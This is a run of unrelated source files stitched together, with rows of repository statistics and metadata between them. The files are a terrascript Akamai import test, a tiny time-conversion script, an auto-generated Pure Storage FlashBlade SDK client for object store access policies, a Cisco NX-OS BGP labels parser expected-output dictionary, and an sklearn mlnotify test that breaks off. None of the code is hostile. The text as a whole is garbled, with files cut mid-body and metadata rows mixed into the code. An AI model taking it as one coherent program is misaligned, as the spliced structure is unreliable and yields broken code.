from terrascript.resource.akamai.akamai import akamai_networklist_subscription
from terrascript.resource.akamai.akamai import akamai_property
from terrascript.resource.akamai.akamai import akamai_property_activation
from terrascript.resource.akamai.akamai import akamai_property_variables
def test_datasource_import():
from terrascript.data.akamai.akamai import akamai_appsec_advanced_settings_logging
from terrascript.data.akamai.akamai import (
akamai_appsec_advanced_settings_pragma_header,
)
from terrascript.data.akamai.akamai import akamai_appsec_advanced_settings_prefetch
from terrascript.data.akamai.akamai import akamai_appsec_api_endpoints
from terrascript.data.akamai.akamai import akamai_appsec_api_request_constraints
from terrascript.data.akamai.akamai import akamai_appsec_attack_groups
from terrascript.data.akamai.akamai import akamai_appsec_bypass_network_lists
from terrascript.data.akamai.akamai import akamai_appsec_configuration
from terrascript.data.akamai.akamai import akamai_appsec_configuration_version
from terrascript.data.akamai.akamai import akamai_appsec_contracts_groups
from terrascript.data.akamai.akamai import akamai_appsec_custom_deny
from terrascript.data.akamai.akamai import akamai_appsec_custom_rule_actions
from terrascript.data.akamai.akamai import akamai_appsec_custom_rules
from terrascript.data.akamai.akamai import akamai_appsec_eval
from terrascript.data.akamai.akamai import akamai_appsec_eval_groups
from terrascript.data.akamai.akamai import akamai_appsec_eval_hostnames
from terrascript.data.akamai.akamai import akamai_appsec_eval_rules
from terrascript.data.akamai.akamai import akamai_appsec_export_configuration
from terrascript.data.akamai.akamai import akamai_appsec_failover_hostnames
from terrascript.data.akamai.akamai import akamai_appsec_hostname_coverage
from terrascript.data.akamai.akamai import (
akamai_appsec_hostname_coverage_match_targets,
)
from terrascript.data.akamai.akamai import (
akamai_appsec_hostname_coverage_overlapping,
)
from terrascript.data.akamai.akamai import akamai_appsec_ip_geo
from terrascript.data.akamai.akamai import akamai_appsec_match_targets
from terrascript.data.akamai.akamai import akamai_appsec_penalty_box
from terrascript.data.akamai.akamai import akamai_appsec_rate_policies
from terrascript.data.akamai.akamai import akamai_appsec_rate_policy_actions
from terrascript.data.akamai.akamai import akamai_appsec_reputation_profile_actions
from terrascript.data.akamai.akamai import akamai_appsec_reputation_profile_analysis
from terrascript.data.akamai.akamai import akamai_appsec_reputation_profiles
from terrascript.data.akamai.akamai import akamai_appsec_rule_upgrade_details
from terrascript.data.akamai.akamai import akamai_appsec_rules
from terrascript.data.akamai.akamai import akamai_appsec_security_policy
from terrascript.data.akamai.akamai import akamai_appsec_security_policy_protections
from terrascript.data.akamai.akamai import akamai_appsec_selectable_hostnames
from terrascript.data.akamai.akamai import akamai_appsec_selected_hostnames
from terrascript.data.akamai.akamai import akamai_appsec_siem_definitions
from terrascript.data.akamai.akamai import akamai_appsec_siem_settings
from terrascript.data.akamai.akamai import akamai_appsec_slow_post
from terrascript.data.akamai.akamai import akamai_appsec_threat_intel
from terrascript.data.akamai.akamai import akamai_appsec_version_notes
from terrascript.data.akamai.akamai import akamai_appsec_waf_mode
from terrascript.data.akamai.akamai import akamai_appsec_wap_selected_hostnames
from terrascript.data.akamai.akamai import akamai_authorities_set
from terrascript.data.akamai.akamai import akamai_contract
from terrascript.data.akamai.akamai import akamai_contracts
from terrascript.data.akamai.akamai import akamai_cp_code
from terrascript.data.akamai.akamai import akamai_dns_record_set
from terrascript.data.akamai.akamai import akamai_group
from terrascript.data.akamai.akamai import akamai_groups
from terrascript.data.akamai.akamai import akamai_gtm_default_datacenter
from terrascript.data.akamai.akamai import akamai_iam_contact_types
from terrascript.data.akamai.akamai import akamai_iam_countries
from terrascript.data.akamai.akamai import akamai_iam_groups
from terrascript.data.akamai.akamai import akamai_iam_roles
from terrascript.data.akamai.akamai import akamai_iam_states
from terrascript.data.akamai.akamai import akamai_iam_supported_langs
from terrascript.data.akamai.akamai import akamai_iam_timeout_policies
from terrascript.data.akamai.akamai import akamai_networklist_network_lists
from terrascript.data.akamai.akamai import akamai_properties
from terrascript.data.akamai.akamai import akamai_property
from terrascript.data.akamai.akamai import akamai_property_hostnames
from terrascript.data.akamai.akamai import akamai_property_products
from terrascript.data.akamai.akamai import akamai_property_rule_formats
from terrascript.data.akamai.akamai import akamai_property_rules
from terrascript.data.akamai.akamai import akamai_property_rules_template
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.akamai.akamai
#
# t = terrascript.provider.akamai.akamai.akamai()
# s = str(t)
#
# assert 'https://github.com/akamai/terraform-provider-akamai' in s
# assert '1.7.0' in s
| 36.214521 | 88 | 0.828215 | 1,376 | 10,973 | 6.323401 | 0.119913 | 0.186186 | 0.268935 | 0.358579 | 0.908401 | 0.899207 | 0.894035 | 0.864728 | 0.618779 | 0.264337 | 0 | 0.001567 | 0.127495 | 10,973 | 302 | 89 | 36.334437 | 0.907249 | 0.044291 | 0 | 0.072368 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003311 | 0 | 1 | 0.019737 | true | 0.013158 | 0.881579 | 0 | 0.901316 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
7088bda3e14f16f17c3f840d6b284810b79da6e8 | 88 | py | Python | URI_1019.py | JVLJunior/Exercicios-URI | 321c50edc67f8f373cfd91ade5b2b8a9c1a47b86 | [
"MIT"
] | null | null | null | URI_1019.py | JVLJunior/Exercicios-URI | 321c50edc67f8f373cfd91ade5b2b8a9c1a47b86 | [
"MIT"
] | null | null | null | URI_1019.py | JVLJunior/Exercicios-URI | 321c50edc67f8f373cfd91ade5b2b8a9c1a47b86 | [
"MIT"
] | null | null | null | t = int(input())
print('{}:{}:{}'.format(t // 3600, (t % 3600) // 60, (t % 3600) % 60))
| 29.333333 | 70 | 0.443182 | 13 | 88 | 3 | 0.538462 | 0.384615 | 0.358974 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 0.181818 | 88 | 2 | 71 | 44 | 0.319444 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
5614b263e7f7a860f0b1b2385cfdd29151d0af0a | 27,297 | py | Python | purity_fb/purity_fb_1dot12/apis/object_store_access_policies_api.py | tlewis-ps/purity_fb_python_client | 652835cbd485c95a86da27f8b661679727ec6ea0 | [
"Apache-2.0"
] | 5 | 2017-09-08T20:47:22.000Z | 2021-06-29T02:11:05.000Z | purity_fb/purity_fb_1dot12/apis/object_store_access_policies_api.py | tlewis-ps/purity_fb_python_client | 652835cbd485c95a86da27f8b661679727ec6ea0 | [
"Apache-2.0"
] | 16 | 2017-11-27T20:57:48.000Z | 2021-11-23T18:46:43.000Z | purity_fb/purity_fb_1dot12/apis/object_store_access_policies_api.py | tlewis-ps/purity_fb_python_client | 652835cbd485c95a86da27f8b661679727ec6ea0 | [
"Apache-2.0"
] | 22 | 2017-10-13T15:33:05.000Z | 2021-11-08T19:56:21.000Z | # coding: utf-8
"""
Pure Storage FlashBlade REST 1.12 Python SDK
Pure Storage FlashBlade REST 1.12 Python SDK. Compatible with REST API versions 1.0 - 1.12. Developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.12
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ObjectStoreAccessPoliciesApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_object_store_access_policies_object_store_users(self, **kwargs):
"""
Add a policy to an object store user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_object_store_access_policies_object_store_users(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: ObjectStoreAccessPolicyObjectStoreUserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_object_store_access_policies_object_store_users_with_http_info(**kwargs)
else:
(data) = self.add_object_store_access_policies_object_store_users_with_http_info(**kwargs)
return data
def add_object_store_access_policies_object_store_users_with_http_info(self, **kwargs):
"""
Add a policy to an object store user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_object_store_access_policies_object_store_users_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: ObjectStoreAccessPolicyObjectStoreUserResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['policy_ids', 'policy_names', 'member_ids', 'member_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_object_store_access_policies_object_store_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.12/object-store-access-policies/object-store-users', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectStoreAccessPolicyObjectStoreUserResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_object_store_access_policies(self, **kwargs):
"""
List object store access policies.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_object_store_access_policies(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: The filter to be used for query.
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param int limit: limit, should be >= 0
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: ObjectStoreAccessPolicyResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_object_store_access_policies_with_http_info(**kwargs)
else:
(data) = self.list_object_store_access_policies_with_http_info(**kwargs)
return data
def list_object_store_access_policies_with_http_info(self, **kwargs):
"""
List object store access policies.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_object_store_access_policies_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: The filter to be used for query.
:param list[str] ids: A comma-separated list of resource IDs. This cannot be provided together with the name or names query parameters.
:param int limit: limit, should be >= 0
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: ObjectStoreAccessPolicyResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter', 'ids', 'limit', 'names', 'sort', 'start', 'token']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_object_store_access_policies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'ids' in params:
query_params.append(('ids', params['ids']))
collection_formats['ids'] = 'csv'
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'token' in params:
query_params.append(('token', params['token']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.12/object-store-access-policies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectStoreAccessPolicyResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_object_store_access_policies_object_store_users(self, **kwargs):
"""
List object store access policies for object store users.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_object_store_access_policies_object_store_users(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: ObjectStoreAccessPolicyObjectStoreUserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_object_store_access_policies_object_store_users_with_http_info(**kwargs)
else:
(data) = self.list_object_store_access_policies_object_store_users_with_http_info(**kwargs)
return data
def list_object_store_access_policies_object_store_users_with_http_info(self, **kwargs):
"""
List object store access policies for object store users.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_object_store_access_policies_object_store_users_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:param str sort: Sort the response by the specified fields (in descending order if '-' is appended to the field name).
:param int start: The offset of the first resource to return from a collection.
:param str token: An opaque token used to iterate over a collection. The token to use on the next request is returned in the `continuation_token` field of the result.
:return: ObjectStoreAccessPolicyObjectStoreUserResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter', 'limit', 'policy_ids', 'policy_names', 'member_ids', 'member_names', 'sort', 'start', 'token']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_object_store_access_policies_object_store_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'token' in params:
query_params.append(('token', params['token']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.12/object-store-access-policies/object-store-users', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ObjectStoreAccessPolicyObjectStoreUserResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_object_store_access_policies_object_store_users(self, **kwargs):
"""
Remove a policy from an object store user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.remove_object_store_access_policies_object_store_users(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.remove_object_store_access_policies_object_store_users_with_http_info(**kwargs)
else:
(data) = self.remove_object_store_access_policies_object_store_users_with_http_info(**kwargs)
return data
def remove_object_store_access_policies_object_store_users_with_http_info(self, **kwargs):
"""
Remove a policy from an object store user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.remove_object_store_access_policies_object_store_users_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] policy_ids: A comma-separated list of policy IDs. This cannot be provided together with the policy names query parameters.
:param list[str] policy_names: A comma-separated list of policy names. This cannot be provided together with the policy ids query parameters.
:param list[str] member_ids: A comma-separated list of member ids. This cannot be provided together with the member names query parameters.
:param list[str] member_names: A comma-separated list of member names. This cannot be provided together with the member ids query parameters.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['policy_ids', 'policy_names', 'member_ids', 'member_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_object_store_access_policies_object_store_users" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'policy_ids' in params:
query_params.append(('policy_ids', params['policy_ids']))
collection_formats['policy_ids'] = 'csv'
if 'policy_names' in params:
query_params.append(('policy_names', params['policy_names']))
collection_formats['policy_names'] = 'csv'
if 'member_ids' in params:
query_params.append(('member_ids', params['member_ids']))
collection_formats['member_ids'] = 'csv'
if 'member_names' in params:
query_params.append(('member_names', params['member_names']))
collection_formats['member_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.12/object-store-access-policies/object-store-users', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 50.55 | 251 | 0.622633 | 3,106 | 27,297 | 5.262395 | 0.066645 | 0.044417 | 0.037443 | 0.055063 | 0.953686 | 0.950749 | 0.947201 | 0.942551 | 0.935332 | 0.928602 | 0 | 0.001725 | 0.299337 | 27,297 | 539 | 252 | 50.643785 | 0.85287 | 0.420669 | 0 | 0.803704 | 0 | 0 | 0.179548 | 0.05342 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.025926 | 0 | 0.107407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
562b27b23b19af576279837471423f4e02a42f04 | 9,367 | py | Python | src/genie/libs/parser/nxos/tests/ShowBgpLabels/cli/equal/golden_output_3_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/nxos/tests/ShowBgpLabels/cli/equal/golden_output_3_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/nxos/tests/ShowBgpLabels/cli/equal/golden_output_3_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z |
expected_output = {
'vrf':
{'VRF1':
{'address_family':
{'ipv6 unicast':
{'prefix':
{'2001:db8:4519::/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492287',
'nexthop': '2001:db8:1c39:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4519::1:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492287',
'nexthop': '2001:db8:1c39:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4519::2:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492287',
'nexthop': '2001:db8:1c39:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4519::3:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492287',
'nexthop': '2001:db8:1c39:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4519::4:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492287',
'nexthop': '2001:db8:1c39:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4840::/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '21',
'nexthop': '::ffff:10.51.1.101',
'out_label': '16',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4840::1:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '22',
'nexthop': '::ffff:10.51.1.101',
'out_label': '17',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4840::2:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '23',
'nexthop': '::ffff:10.51.1.101',
'out_label': '18',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4840::3:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '24',
'nexthop': '::ffff:10.51.1.101',
'out_label': '19',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'2001:db8:4840::4:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '25',
'nexthop': '::ffff:10.51.1.101',
'out_label': '20',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}}},
'router_id': '10.81.1.1',
'table_version': 18}}},
'default':
{'address_family':
{'ipv6 unicast':
{'prefix':
{'2001:db8:4410::/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '2001:db8:1900:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}},
'2001:db8:4410::1:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '2001:db8:1900:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}},
'2001:db8:4410::2:0/112':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '2001:db8:1900:1::1:101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}}},
'router_id': '10.1.1.1',
'table_version': 11}}}}}
| 51.185792 | 72 | 0.211914 | 497 | 9,367 | 3.822938 | 0.120724 | 0.077368 | 0.061579 | 0.088947 | 0.941579 | 0.941579 | 0.941579 | 0.902632 | 0.831579 | 0.831579 | 0 | 0.131763 | 0.664567 | 9,367 | 182 | 73 | 51.467033 | 0.472947 | 0 | 0 | 0.816667 | 0 | 0 | 0.222958 | 0.042285 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
564f2f423afa2e556ca172c1668f6419b25d3c2d | 3,700 | py | Python | sdk/tests/test_sklearn.py | fossabot/mlnotify | a55adf4f137a831b5f62f6155edbd188b7a76803 | [
"MIT"
] | null | null | null | sdk/tests/test_sklearn.py | fossabot/mlnotify | a55adf4f137a831b5f62f6155edbd188b7a76803 | [
"MIT"
] | null | null | null | sdk/tests/test_sklearn.py | fossabot/mlnotify | a55adf4f137a831b5f62f6155edbd188b7a76803 | [
"MIT"
] | null | null | null | from typing import Any
import pytest
from sklearn import datasets, svm, tree
import mlnotify # noqa: F401
from tests.utils import MockedNotifyPlugin
SKLearnSampleData = Any
@pytest.fixture
def sample_data() -> SKLearnSampleData:
return datasets.load_digits()
# svm
def test_sklearn_svm_svc_fit(sample_data: SKLearnSampleData, mocked_notify_plugin: MockedNotifyPlugin):
clf = svm.SVC()
